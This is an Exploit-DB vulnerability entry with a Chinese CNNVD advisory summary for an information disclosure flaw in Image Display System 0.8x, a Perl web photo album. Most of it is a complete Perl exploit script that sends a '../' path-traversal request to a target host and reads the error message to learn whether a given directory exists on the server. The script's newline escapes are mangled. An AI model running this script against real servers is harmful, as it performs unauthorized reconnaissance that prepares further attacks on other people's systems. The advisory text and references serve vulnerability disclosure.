https://www.exploit-db.com/exploits/21487
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200212-786

IDS(ImageDisplaySystem)是一款基于Web的图象册应用程序，由Perl编写，AshleyM.Kirchner维护。IDS对用户提交的请求缺少正确的处理，可导致远程攻击者获得主机相关的路径信息。攻击者可以提交包含’../’字符的目录和图象册名称的请求，就可以导致IDS返回包含目录是否存在的错误信息，攻击者可以通过此信息进一步对系统进行攻击。问题存在于如下处理代码中：idsShared.pm::getAlbumToDisplay()=================================if($albumtodisplayne’/’&&!-e$ppath.”albums/$albumtodisplay”){#doesthisalbumexist?bail(“Sorry，thealbum”$albumtodisplay”doesn’texist:$!”);}if($albumtodisplay=~/../){#hax0rprotection…bail(“Sorry，invaliddirectoryname:$!”);}

source: http://www.securityfocus.com/bid/4870/info

IDS (Image Display System) is an web based photo album application written in Perl. IDS is freely available and is maintained by Ashley M. Kirchner.

Users can confirm the existence and location of various directories residing on the IDS host. This is accomplished when a request for a directory and album name is sent to the host containing numerous '../' character sequences. The error page returned will indicate to the attacker whether the specified path is a valid directory or not. 

#!/usr/bin/perl -w
#
# ids-inform.pl (05/27/2002)
#
# Image Display System 0.8x Information Disclosure Exploit.
# Checks for existance of specified directory.
#
# By: isox [[email protected]]
#
#
# usage: self explanitory
#
# my spelling: bad
#
# Hi Cody, You should be proud, I coded for you!
# Hi YpCat, Your perl is k-rad and pheersom.
#
#######
# URL #
#######
# http://0xc0ffee.com
# http://hhp-programming.net
#
#
#################
# Advertisement #
#################
#
# Going to Defcon X this year?  Well come to the one and only Dennys at Defcon breakfast.
# This is quickly becoming a yearly tradition put on by isox.  Check 0xc0ffee.com for
# more information.
#

$maxdepth = 30;

&Banner;

if ($#ARGV < 3) {
  die("Usage $0 <directory> <http://host/path/to/index.cgi> <host> <port>n");
}

for($t=0; $t<$maxdepth; $t++) {
  $dotdot = "$dotdot" . "/..";
}

$query = "GET $ARGV[1]" . "?mode=album&album=$dotdot/$ARGV[0]nn";
$blahblah = &Directory($query, $ARGV[2], $ARGV[3]);

if($blahblah =~ /Sorry, invalid directory name/) {
  print("$ARGV[0] Exists.n");
} else {
  print("$ARGV[0] Does Not Exist.n");
}

exit 0;




sub Banner {
  print("IDS Information Disclosure Exploitn");
  print("Written by isox [[email protected]]nn");
}


sub Directory {
  use IO::Socket::INET;

  my($query, $host, $port) = @_;

  $sock = new IO::Socket::INET (
            PeerAddr => $host,
            PeerPort => $port,
            Timeout => 8,
            Proto => 'tcp'
          );

  if(!$sock) {
    die("sock: timed outn");
  }


  print $sock $query;
  read($sock, $buf, 8192);
  close($sock);

  return $buf;
}

<-- EOF -->

来源:BID
名称:4870
链接:http://www.securityfocus.com/bid/4870
来源:XF
名称:ids-dir-existence(9201)
链接:http://www.iss.net/security_center/static/9201.php
来源:ids.sourceforge.net
链接:http://ids.sourceforge.net/ChangeLog.html
来源：NSFOCUS
名称：2881
链接：http://www.nsfocus.net/vulndb/2881